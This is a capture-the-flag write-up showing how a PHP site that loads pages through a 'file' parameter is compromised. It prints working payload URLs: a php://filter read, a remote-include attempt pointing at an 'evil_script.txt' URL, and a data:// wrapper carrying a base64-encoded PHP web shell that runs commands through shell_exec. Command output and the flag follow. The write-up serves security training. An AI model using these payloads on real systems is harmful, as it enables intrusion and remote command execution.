3D Industry is a freshly launched startup which is specialized in 3D printing. The CEO has some doubts about the secured development of the website. Can you prove him that his doubts are well-founded ?
We're facing a website with a single entrypoint : index.php
.
Each pages is loaded using GET parameter file
:
- services.php
- creations.php
- contact.php
The first thing to try is a Local File Inclusion (LFI) using wrappers to read some files, but without success.
https://3d-industry.santhacklaus.xyz/index.php?file=php://filter/convert.base64-encode/resource=services.php
Second try is a Remote File Inclusion (RFI), still nothing.
https://3d-industry.santhacklaus.xyz/index.php?file=https://tapz.eu/evil_script.txt
After searching on the Internet, I came across a technique to obtain a Remote Code Execution (RCE), still using wrappers.
https://3d-industry.santhacklaus.xyz/index.php?file=data:text/plain;base64,PD9waHAgZWNobyhzaGVsbF9leGVjKCRfR0VUWydjbWQnXSkpOw==&cmd=id
The base64-encoded string is a small script to execute a command passed by GET parameter cmd
.
<?php echo(shell_exec($_GET['cmd']));
The script is executed, and we're now able to execute commands on the server.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -la
total 68
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 .
drwxr-xr-x 1 root root 4096 Dec 14 19:15 ..
-r-xr-xr-x 1 1001 1001 8196 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .hidden
-r-xr-xr-x 1 1001 1001 267 Dec 12 08:33 accueil.php
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 admin
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 config
-r-xr-xr-x 1 1001 1001 448 Dec 12 08:33 contact.php
-r-xr-xr-x 1 1001 1001 996 Dec 12 08:33 creations.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 inc
-r-xr-xr-x 1 1001 1001 580 Dec 12 08:33 index.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 lang
-r-xr-xr-x 1 1001 1001 125 Dec 12 08:33 lang.php
-r-xr-xr-x 1 1001 1001 461 Dec 12 08:33 services.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 style
$ ls -la .hidden
total 20
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001 6148 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 this
[..]
$ ls -la .hidden/this/is/the/path/to/the/flag/
total 12
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001 70 Dec 12 08:33 flag.txt
$ cat .hidden/this/is/the/path/to/the/flag/flag.txt
Well done ! You can validate with the flag:
IMTLD{B3w4r30fURL1nclud3}